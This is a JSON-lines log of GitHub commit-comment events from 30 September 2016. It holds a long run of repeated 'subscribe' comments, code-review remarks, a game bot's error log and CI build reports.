{"id":"4640948711","type":"CommitCommentEvent","actor":{"login":"arq5x"},"repo":{"name":"gogetdata/ggd-recipes"},"payload":{"comment":{"id":19235014,"position":null,"line":null,"path":null,"commit_id":"6d3baa4d14f44dd42704fcdee5437df763bc26be","created_at":"2016-09-30T01:26:14Z","updated_at":"2016-09-30T01:26:14Z","body":"Ah nice catch"}},"created_at":"2016-09-30T01:26:14Z"}
{"id":"4640949091","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235015,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:26:24Z","updated_at":"2016-09-30T01:26:24Z","body":"subscribe 148"}},"created_at":"2016-09-30T01:26:24Z"}
{"id":"4640950306","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235018,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:26:51Z","updated_at":"2016-09-30T01:26:51Z","body":"subscribe 149"}},"created_at":"2016-09-30T01:26:51Z"}
{"id":"4640951661","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235021,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:27:21Z","updated_at":"2016-09-30T01:27:21Z","body":"subscribe 150"}},"created_at":"2016-09-30T01:27:21Z"}
{"id":"4640952857","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235024,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:27:48Z","updated_at":"2016-09-30T01:27:48Z","body":"subscribe 151"}},"created_at":"2016-09-30T01:27:48Z"}
{"id":"4640953851","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19235028,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T01:28:11Z","updated_at":"2016-09-30T01:28:11Z","body":"[08:11:45 AM]  Hero Level 30\r\n[08:11:45 AM]  Changing objective to: Hero Management\r\n[08:11:47 AM]  Scene: Adventure Start\r\n[08:11:50 AM]  Scene: Hero Join\r\n[08:11:52 AM]  Scene: Heroes\r\n[08:11:52 AM]  Start managing heroes\r\n[08:11:53 AM]  Checking each position for level 30...\r\n[08:11:55 AM]  - Got position: 3\r\n[08:11:59 AM]  - Got position: 5\r\n[08:12:04 AM]  Finding heroes...\r\n[08:12:07 AM]  Replaced hero position: 3\r\n[08:12:15 AM]  Replaced hero position: 5\r\n[08:12:15 AM]  Done managing heroes\r\n[08:12:15 AM]  Changing objective to: Adventure\r\n[08:12:21 AM]  Scene: Adventure Start\r\n[08:12:40 AM]  Scene: ...\r\n[08:12:40 AM]  cannot find scene escape\r\n[08:12:44 AM]  Scene: Lobby\r\n[08:12:46 AM]  Scene: Adventure Modes\r\n[08:12:50 AM]  Scene: Map Select\r\n[08:12:53 AM]  Scene: Adventure Ready\r\n[08:12:56 AM]  Scene: Adventure Start\r\n[08:12:59 AM]  Scene: Heroes\r\n[08:13:02 AM]  Scene: Map Select\r\n[08:13:06 AM]  Scene: Adventure Ready\r\n[08:13:09 AM]  Scene: Adventure Start\r\n[08:13:11 AM]  Scene: Hero Join\r\n[08:13:13 AM]  Scene: Heroes\r\n[08:13:16 AM]  Scene: Map Select\r\n[08:13:20 AM]  Scene: Adventure Ready\r\n[08:13:23 AM]  Scene: Adventure Start\r\n[08:13:25 AM]  Scene: Hero Join\r\n[08:13:27 AM]  Scene: Heroes\r\n[08:13:30 AM]  Scene: Map Select\r\n[08:13:34 AM]  Scene: Adventure Ready\r\n[08:13:37 AM]  Scene: Adventure Start\r\n[08:13:39 AM]  Scene: Hero Join\r\n[08:13:41 AM]  Scene: Heroes\r\n[08:13:44 AM]  Scene: Map Select\r\n[08:13:48 AM]  Scene: Adventure Ready\r\n[08:13:51 AM]  Scene: Adventure Start\r\n[08:13:53 AM]  Scene: Hero Join\r\n\r\nI have trouble adventure, after changing the hero lv30 does not continue.\r\nsorry for bad eng."}},"created_at":"2016-09-30T01:28:11Z"}
{"id":"4640954218","type":"CommitCommentEvent","actor":{"login":"ondevops"},"repo":{"name":"ondevops/dev-company-work"},"payload":{"comment":{"id":19235029,"position":null,"line":null,"path":null,"commit_id":"13626edb7bfd2c986564661a6d681216a0fed8db","created_at":"2016-09-30T01:28:19Z","updated_at":"2016-09-30T01:28:19Z","body":"LGTM"}},"created_at":"2016-09-30T01:28:19Z"}
{"id":"4640954295","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235030,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:28:21Z","updated_at":"2016-09-30T01:28:21Z","body":"subscribe 152"}},"created_at":"2016-09-30T01:28:21Z"}
{"id":"4640955411","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235032,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:28:47Z","updated_at":"2016-09-30T01:28:47Z","body":"subscribe 153"}},"created_at":"2016-09-30T01:28:47Z"}
{"id":"4640956747","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235037,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:29:18Z","updated_at":"2016-09-30T01:29:18Z","body":"subscribe 154"}},"created_at":"2016-09-30T01:29:18Z"}
{"id":"4640957854","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235040,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:29:45Z","updated_at":"2016-09-30T01:29:45Z","body":"subscribe 155"}},"created_at":"2016-09-30T01:29:45Z"}
{"id":"4640958718","type":"CommitCommentEvent","actor":{"login":"Nedjim"},"repo":{"name":"Nedjim/laurenW"},"payload":{"comment":{"id":19235045,"position":2,"line":2,"path":"README.md","commit_id":"515c207d93b4138f194075ba64491d5f2da7abb2","created_at":"2016-09-30T01:30:01Z","updated_at":"2016-09-30T01:30:01Z","body":"lien: https://nedjim.github.io/laurenW/index.html"}},"created_at":"2016-09-30T01:30:01Z"}
{"id":"4640959491","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235046,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:30:17Z","updated_at":"2016-09-30T01:30:17Z","body":"subscribe 156"}},"created_at":"2016-09-30T01:30:17Z"}
{"id":"4640960329","type":"CommitCommentEvent","actor":{"login":"liquid0624"},"repo":{"name":"LiquidNougat/frameworks_base"},"payload":{"comment":{"id":19235049,"position":null,"line":null,"path":null,"commit_id":"ff8cc428e65e838f7d44a7da4e5c86071f3dbd36","created_at":"2016-09-30T01:30:34Z","updated_at":"2016-09-30T01:30:34Z","body":"Yea im not really putting alot of effort into things right now i will fix it for you sorry"}},"created_at":"2016-09-30T01:30:34Z"}
{"id":"4640960810","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235050,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:30:45Z","updated_at":"2016-09-30T01:30:45Z","body":"subscribe 157"}},"created_at":"2016-09-30T01:30:45Z"}
{"id":"4640961261","type":"CommitCommentEvent","actor":{"login":"RByers"},"repo":{"name":"w3c/web-platform-tests"},"payload":{"comment":{"id":19235052,"position":null,"line":null,"path":null,"commit_id":"8221d3049f6008c5adeb0555b7b37b4f6d7ca15d","created_at":"2016-09-30T01:30:55Z","updated_at":"2016-09-30T01:30:55Z","body":"[Chromium bug](https://bugs.chromium.org/p/chromium/issues/detail?id=651660)\r\n[WebKit bug](https://bugs.webkit.org/show_bug.cgi?id=147740)"}},"created_at":"2016-09-30T01:30:55Z"}
{"id":"4640962101","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235053,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:31:13Z","updated_at":"2016-09-30T01:31:13Z","body":"subscribe 158"}},"created_at":"2016-09-30T01:31:13Z"}
{"id":"4640963389","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235056,"position":null,"line":null,"path":null,"commit_id":"e965863f4bf95041f60d207d606d2dc621a9e0fa","created_at":"2016-09-30T01:31:42Z","updated_at":"2016-09-30T01:31:42Z","body":"buildingunit (nmerket) - x86_64-MacOS-10.10-clang: OK (2391 of 2452 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.51%25-yellow.svg)</a> \n"}},"created_at":"2016-09-30T01:31:42Z"}
{"id":"4640963471","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235057,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:31:44Z","updated_at":"2016-09-30T01:31:44Z","body":"subscribe 159"}},"created_at":"2016-09-30T01:31:44Z"}
{"id":"4640964816","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235058,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:32:12Z","updated_at":"2016-09-30T01:32:12Z","body":"subscribe 160"}},"created_at":"2016-09-30T01:32:12Z"}
{"id":"4640965171","type":"CommitCommentEvent","actor":{"login":"liquid0624"},"repo":{"name":"LiquidNougat/frameworks_base"},"payload":{"comment":{"id":19235059,"position":null,"line":null,"path":null,"commit_id":"ff8cc428e65e838f7d44a7da4e5c86071f3dbd36","created_at":"2016-09-30T01:32:19Z","updated_at":"2016-09-30T01:32:19Z","body":"I highly respect you and your work as well as joe and its always very good"}},"created_at":"2016-09-30T01:32:19Z"}
{"id":"4640965929","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235061,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:32:38Z","updated_at":"2016-09-30T01:32:38Z","body":"subscribe 161"}},"created_at":"2016-09-30T01:32:38Z"}
{"id":"4640967118","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235062,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:33:06Z","updated_at":"2016-09-30T01:33:06Z","body":"subscribe 162"}},"created_at":"2016-09-30T01:33:06Z"}
{"id":"4640968738","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235065,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:33:44Z","updated_at":"2016-09-30T01:33:44Z","body":"subscribe 163"}},"created_at":"2016-09-30T01:33:44Z"}
{"id":"4640969976","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235067,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:34:13Z","updated_at":"2016-09-30T01:34:13Z","body":"subscribe 164"}},"created_at":"2016-09-30T01:34:13Z"}
{"id":"4640971226","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235068,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:34:41Z","updated_at":"2016-09-30T01:34:41Z","body":"subscribe 165"}},"created_at":"2016-09-30T01:34:41Z"}
{"id":"4640973060","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235070,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:35:25Z","updated_at":"2016-09-30T01:35:25Z","body":"subscribe 166"}},"created_at":"2016-09-30T01:35:25Z"}
{"id":"4640974120","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235072,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:35:52Z","updated_at":"2016-09-30T01:35:52Z","body":"subscribe 167"}},"created_at":"2016-09-30T01:35:52Z"}
{"id":"4640975256","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235074,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:36:19Z","updated_at":"2016-09-30T01:36:19Z","body":"subscribe 168"}},"created_at":"2016-09-30T01:36:19Z"}
{"id":"4640976305","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235079,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:36:46Z","updated_at":"2016-09-30T01:36:46Z","body":"subscribe 169"}},"created_at":"2016-09-30T01:36:46Z"}
{"id":"4640976479","type":"CommitCommentEvent","actor":{"login":"Yes197"},"repo":{"name":"Yes197/prueba2"},"payload":{"comment":{"id":19235080,"position":3,"line":3,"path":"README.md","commit_id":"8ba49a4f6de895d11c520e3f49ee47843d3ff0d9","created_at":"2016-09-30T01:36:50Z","updated_at":"2016-09-30T01:36:50Z","body":"jajdsifidsfs"}},"created_at":"2016-09-30T01:36:50Z"}
{"id":"4640977547","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235082,"position":5,"line":230,"path":".gitignore","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T01:37:16Z","updated_at":"2016-09-30T01:37:16Z","body":"음 이것까지 껴야 빌드환경이 되는거 아녀?"}},"created_at":"2016-09-30T01:37:16Z"}
{"id":"4640977886","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235083,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:37:24Z","updated_at":"2016-09-30T01:37:24Z","body":"subscribe 170"}},"created_at":"2016-09-30T01:37:24Z"}
{"id":"4640979067","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235084,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:37:54Z","updated_at":"2016-09-30T01:37:54Z","body":"subscribe 171"}},"created_at":"2016-09-30T01:37:54Z"}
{"id":"4640980261","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235087,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:38:21Z","updated_at":"2016-09-30T01:38:21Z","body":"subscribe 172"}},"created_at":"2016-09-30T01:38:21Z"}
{"id":"4640981369","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235090,"position":1,"line":1,"path":"be/BackCanonProject/WebContent/index.html","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T01:38:49Z","updated_at":"2016-09-30T01:38:49Z","body":"우리 BE가 view 역활은 없으니깐 WebContent는 필요없을거여"}},"created_at":"2016-09-30T01:38:49Z"}
{"id":"4640981448","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235091,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:38:51Z","updated_at":"2016-09-30T01:38:51Z","body":"subscribe 173"}},"created_at":"2016-09-30T01:38:51Z"}
{"id":"4640982685","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235093,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:39:20Z","updated_at":"2016-09-30T01:39:20Z","body":"subscribe 174"}},"created_at":"2016-09-30T01:39:20Z"}
{"id":"4640982747","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235094,"position":null,"line":null,"path":".gitignore","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T01:39:22Z","updated_at":"2016-09-30T01:39:22Z","body":"굿잡 초반 환경구성은 얼추 된듯하군"}},"created_at":"2016-09-30T01:39:22Z"}
{"id":"4640983856","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235096,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:39:48Z","updated_at":"2016-09-30T01:39:48Z","body":"subscribe 175"}},"created_at":"2016-09-30T01:39:48Z"}
{"id":"4640985162","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235100,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:40:19Z","updated_at":"2016-09-30T01:40:19Z","body":"subscribe 176"}},"created_at":"2016-09-30T01:40:19Z"}
{"id":"4640986026","type":"CommitCommentEvent","actor":{"login":"hadzimme"},"repo":{"name":"hadzimme/dotfiles"},"payload":{"comment":{"id":19235105,"position":null,"line":null,"path":null,"commit_id":"6eec55b5ba9731a8b06ee600c7f0b9d78d66bf17","created_at":"2016-09-30T01:40:40Z","updated_at":"2016-09-30T01:40:40Z","body":"しかもなんか間違ってるし"}},"created_at":"2016-09-30T01:40:40Z"}
{"id":"4640986358","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235106,"position":17,"line":32,"path":"src/main/java/org/jala/efeeder/foodmeeting/EditFoodMeetingCommand.java","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T01:40:48Z","updated_at":"2016-09-30T01:40:48Z","body":"As we continue working in the code we can start moving this magic strings to static final variables"}},"created_at":"2016-09-30T01:40:48Z"}
{"id":"4640986734","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235109,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:40:57Z","updated_at":"2016-09-30T01:40:57Z","body":"subscribe 177"}},"created_at":"2016-09-30T01:40:57Z"}
{"id":"4640986911","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19235110,"position":null,"line":null,"path":null,"commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-30T01:41:01Z","updated_at":"2016-09-30T01:41:01Z","body":"朗報(?)です、2.6.0 が、まさに昨日、リリースされました。\r\n\r\nなので、「OVS v2.6.0 の NXM を追加しました」と書けそうです。\r\n\r\n```\r\nofproto/nicira_ext: Add missing NXMs in OVS v2.6.0\r\n```\r\nとか"}},"created_at":"2016-09-30T01:41:01Z"}
{"id":"4640988214","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235111,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:41:31Z","updated_at":"2016-09-30T01:41:31Z","body":"subscribe 178"}},"created_at":"2016-09-30T01:41:31Z"}
{"id":"4640989404","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235116,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:42:00Z","updated_at":"2016-09-30T01:42:00Z","body":"subscribe 179"}},"created_at":"2016-09-30T01:42:00Z"}
{"id":"4640990182","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235119,"position":6,"line":6,"path":"src/main/java/org/jala/efeeder/foodmeeting/FoodMeetingStatus.java","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T01:42:20Z","updated_at":"2016-09-30T01:42:20Z","body":"I think that we do not have a defined header for our files.  If that is the case lets remove this"}},"created_at":"2016-09-30T01:42:20Z"}
{"id":"4640990680","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235121,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:42:31Z","updated_at":"2016-09-30T01:42:31Z","body":"subscribe 180"}},"created_at":"2016-09-30T01:42:31Z"}
{"id":"4640990983","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235122,"position":9,"line":9,"path":"be/BackCanonProject/src/main/java/com/canon/normal/resource.properties","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T01:42:40Z","updated_at":"2016-09-30T01:42:40Z","body":"sql config를 인증없이 일단 풀 수 있을까?\r\n로컬 디비도 일단 그렇게하고 ec2에도 db 올릴때 그렇게 해주세요"}},"created_at":"2016-09-30T01:42:40Z"}
{"id":"4640991459","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235123,"position":6,"line":33,"path":"src/main/java/org/jala/efeeder/foodmeeting/SettingMeetingCommand.java","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T01:42:51Z","updated_at":"2016-09-30T01:42:51Z","body":"magic string"}},"created_at":"2016-09-30T01:42:51Z"}
{"id":"4640992001","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235125,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:43:04Z","updated_at":"2016-09-30T01:43:04Z","body":"subscribe 181"}},"created_at":"2016-09-30T01:43:04Z"}
{"id":"4640992737","type":"CommitCommentEvent","actor":{"login":"Mr-ChangK"},"repo":{"name":"Mr-ChangK/hello-world"},"payload":{"comment":{"id":19235127,"position":null,"line":null,"path":null,"commit_id":"f8e886a9f629b939a922d0d119f8373d2a334218","created_at":"2016-09-30T01:43:24Z","updated_at":"2016-09-30T01:43:24Z","body":"test"}},"created_at":"2016-09-30T01:43:24Z"}
{"id":"4640993127","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235132,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:43:33Z","updated_at":"2016-09-30T01:43:33Z","body":"subscribe 182"}},"created_at":"2016-09-30T01:43:33Z"}
{"id":"4640994394","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235134,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:44:05Z","updated_at":"2016-09-30T01:44:05Z","body":"subscribe 183"}},"created_at":"2016-09-30T01:44:05Z"}
{"id":"4640994582","type":"CommitCommentEvent","actor":{"login":"ericoporto"},"repo":{"name":"momja/fgmkJsEngine"},"payload":{"comment":{"id":19235136,"position":null,"line":null,"path":null,"commit_id":"5bbb531f37dfa24067a22f7dcd115da680a0058e","created_at":"2016-09-30T01:44:08Z","updated_at":"2016-09-30T01:44:08Z","body":"Hey, I don't understand how what you made here would work exactly, \r\nbut looking your code, I think there is a way to solve this problem.\r\n\r\nManipulating the value of `screen.rains.raining` one can make the rain be drawn or not. \r\nIf it isn't raining, making it true or false won't make any difference. \r\nIf it's, then it will select if it should be drawn on screen or not.\r\n\r\n    //Rain should be drawn\r\n    screen.rains.raining = true\r\n\r\n    //Rain should not be drawn\r\n    screen.rains.raining = false\r\n\r\n    // also my fault, this variable should be named 'draw', \r\n    //now that I think about it.\r\n\r\nYour idea of having a new action is a cool idea! \r\n\r\nIf I pass the value `inside` to `actions.insideOutside`, \r\nthe value `screen.rains.raining` has, needs to be stored somewhere, \r\nand then do `screen.rains.raining = false`. \r\n\r\nI would suggest storing somewhere inside `engine.st`, \r\nlike `engine.st.wasraining` (I am bad at choosing names).\r\n\r\n(in the future, `engine.st` will enable saving the game!)\r\n\r\nOk, if you passed outside, you need to get the value of \r\n`engine.st.wasraining` and replace in `screen.rains.raining`.\r\n\r\nI am commenting because your code as is doesn't work - or I am doing something wrong here. If I am, just tell me!"}},"created_at":"2016-09-30T01:44:08Z"}
{"id":"4640995680","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235141,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:44:33Z","updated_at":"2016-09-30T01:44:33Z","body":"subscribe 184"}},"created_at":"2016-09-30T01:44:33Z"}
{"id":"4640996972","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235145,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:45:02Z","updated_at":"2016-09-30T01:45:02Z","body":"subscribe 185"}},"created_at":"2016-09-30T01:45:02Z"}
{"id":"4640997333","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19235146,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T01:45:11Z","updated_at":"2016-09-30T01:45:11Z","body":"i'm found it for long time sometimes it bug need to tunning"}},"created_at":"2016-09-30T01:45:11Z"}
{"id":"4640998267","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235147,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:45:31Z","updated_at":"2016-09-30T01:45:31Z","body":"subscribe 186"}},"created_at":"2016-09-30T01:45:31Z"}
{"id":"4640998952","type":"CommitCommentEvent","actor":{"login":"panazzo"},"repo":{"name":"panazzo/corerestclient"},"payload":{"comment":{"id":19235149,"position":null,"line":null,"path":null,"commit_id":"7a640b63a2a9dbc5647294b628a10966d1677ff8","created_at":"2016-09-30T01:45:46Z","updated_at":"2016-09-30T01:45:46Z","body":"Is it really necessary? I just wanted to let the repo as clear as possible "}},"created_at":"2016-09-30T01:45:46Z"}
{"id":"4640999107","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19235152,"position":null,"line":null,"path":null,"commit_id":"9bc2ff064462b1e8018c792a41814501e03bc6ff","created_at":"2016-09-30T01:45:50Z","updated_at":"2016-09-30T01:45:50Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.275.9bc2ff064462b1e8018c792a41814501e03bc6ff](http://build.palaso.org/viewLog.html?buildId=77245&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Execution timeout Build time: 00:35:31"}},"created_at":"2016-09-30T01:45:50Z"}
